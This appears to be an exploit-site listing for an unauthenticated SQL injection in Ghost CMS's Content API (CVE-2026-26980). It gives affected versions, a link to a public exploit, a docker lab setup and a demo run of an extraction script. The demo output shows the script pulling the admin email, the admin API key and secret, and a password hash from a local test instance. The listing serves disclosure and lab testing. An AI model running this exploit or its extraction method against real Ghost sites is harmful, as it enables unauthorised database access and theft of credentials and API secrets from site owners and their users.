Share
## https://sploitus.com/exploit?id=DE7C7340-4852-590A-92BC-B6C31FAA17B7
# [CVE-2026-26980] ๐Ÿ‘ป Ghost CMS Unauthenticated SQLi via Content API

A SQL injection vulnerability existed in Ghost's Content API that allowed unauthenticated attackers to read arbitrary data from the database.

| | |
|---|---|
| **CVE** | CVE-2026-26980 |
| **CVSS** | 9.4 (Critical) |
| **Affected** | Ghost >= 3.24.0, <= 6.19.0 |
| **Fixed** | 6.19.1 |
| **Disclosed** | 2026-02-20 |
| **Credit** | Nicholas Carlini |
| **Public Exploit** | [vognik](https://github.com/vognik/CVE-2026-26980) |
| **Type** | Unauthenticated SQLi via Content API โ†’ Arbitrary DB Read |

# Demo
```
python3 ./main.py --url "http://127.0.0.1:8080/"
================================================================
Ghost CMS - Unauthenticated SQLi Data Extraction
Target:   http://127.0.0.1:8080
API Key:  c3811ee89140d831fbe1ce2446
Tag ID:   69c99dba3d1a5f00012fafaf
Endpoint: Content API (public, no auth)
================================================================

[*] Calibrating oracle... OK

[*] Phase 1: Recon (fast checks)
  length(users.email) = 17
  length(users.password) = 60
  length(users.name) = 5
  length(users.status) = 8
  count(users) (1 chars): 1
  count(members) (1 chars): 0
  count(api_keys) (1 chars): 8
  count(sessions) (1 chars): 0

[*] Phase 2: Extracting values
  Admin email (17 chars): ghost@example.com
  Admin name (5 chars): Ghost
  Admin API key ID (24 chars): 69c99dbb3d1a5f00012fb032
  Admin API secret (64 chars): 92debc121535eda0f1f0fd90328dc5875656cce1348c0711046b315107899865
  Password hash (60 chars): $2a$10$hGCP/7UCJ07Jl0HIj3IhrOnOGqSJFr3MXL2QrE3dXWJrst/v3E.SC
```

# Lab Setup
```
docker run -p 8080:2368 -e database__client=sqlite3 -e database__connection__filename=/var/lib/ghost/content/data/ghost.db -e url=http://localhost:2368 -e port=2368 ghost:6.16.1
```

# Original Research

[![Watch](https://img.youtube.com/vi/1sd26pWhfmg/maxresdefault.jpg)](https://www.youtube.com/watch?v=1sd26pWhfmg)